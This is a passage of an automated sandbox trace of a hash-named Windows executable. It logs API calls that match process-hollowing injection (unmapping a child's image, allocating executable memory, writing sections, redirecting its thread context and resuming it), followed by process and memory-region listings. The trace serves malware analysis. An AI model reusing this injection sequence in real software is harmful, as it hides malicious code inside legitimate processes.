FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x498440, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0066.941] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0066.941] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0067.049] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0067.055] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x3d915a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x3d915a0*, NumberOfBytesWritten=0x0) returned 0x0 [0067.088] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x3d919a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x3d919a0*, NumberOfBytesWritten=0x0) returned 0x0 [0067.131] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x3e5bfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x3e5bfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0067.157] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x3e99ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x3e99ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0067.179] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x3e9ffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x3e9ffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0067.205] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x3ea01a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x3ea01a0*, NumberOfBytesWritten=0x0) returned 0x0 [0067.236] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x3d916ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3d916ec*, lpNumberOfBytesWritten=0x0) returned 1 [0067.237] SetThreadContext (hThread=0x74, lpContext=0x390000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0067.238] ResumeThread (hThread=0x74) returned 0x1 [0067.292] CloseHandle (hObject=0x74) returned 1 [0067.295] CloseHandle (hObject=0x78) returned 1 [0067.295] ExitProcess (uExitCode=0x0) [0067.296] HeapFree (in: hHeap=0x2630000, dwFlags=0x0, lpMem=0x26307d0 | out: hHeap=0x2630000) returned 1 Process: id = "2" image_name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" page_root = "0x439ed000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf08" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 321 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 322 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 323 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 324 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 325 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 326 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 327 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498440 region_type = mapped_file name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") Region: id = 328 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 329 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 330 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 331 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 332 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 333 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 334 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 335 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 336 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 337 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 338 start_va = 0x1a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 339 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 340 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 341 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 342 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 343 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 344 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 345 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 346 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 347 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 348 start_va = 0x540000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 349 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 350 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 351 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 352 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 353 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 354 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 355 start_va = 0x230000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 356 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 357 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 